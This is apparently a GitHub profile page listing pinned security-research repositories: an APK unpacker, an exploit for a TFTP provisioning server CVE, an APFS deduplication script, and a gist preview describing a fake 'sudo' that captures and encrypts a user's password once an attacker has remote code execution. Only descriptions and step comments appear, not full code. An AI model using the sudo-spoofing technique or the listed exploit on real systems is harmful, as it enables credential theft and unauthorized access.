-
North American Bancard
- in/ysaxon
Pinned Loading
-
legu_unpacker_2023
legu_unpacker_2023 PublicForked from quarkslab/legu_unpacker_2019
Scripts to unpack APK protected by Legu
-
TFTPlunder
TFTPlunder PublicInfo and exploit for CVE-2023-29930: blind file read/write in Genesys TFTP provisioning server configuration
Python 1
-
Shell script to deduplicate in a dir...
Shell script to deduplicate in a directory with MacOS APFS cow copies using rdfind 1#!/bin/zsh
23# Optionally use apfs-clonechecker to check for clones before recloning, useful if you are rerunning the script
4export do_clone_check=${do_clone_check:-1}
5export cleanup=${cleanup:-1}
-
bash sudo spoofer, to obtain a users...
bash sudo spoofer, to obtain a users password if you have RCE but need their password to sudo 1#step 1: generate an rsa public/private keypair, and write your public key into the script below
2#step 2: put this script onto the computer you are attacking, make it executable, and ensure it has higher PATH priority than real sudo
3#step 3: after you obtain the encrypted password, decrypt it with cat .penc | openssl rsautl -decrypt -inkey your_key.priv
4#note that you could easily modify to spoof other password taking utils like sudosh or su
5
Something went wrong, please refresh the page to try again.
If the problem persists, check the GitHub status page or contact support.
If the problem persists, check the GitHub status page or contact support.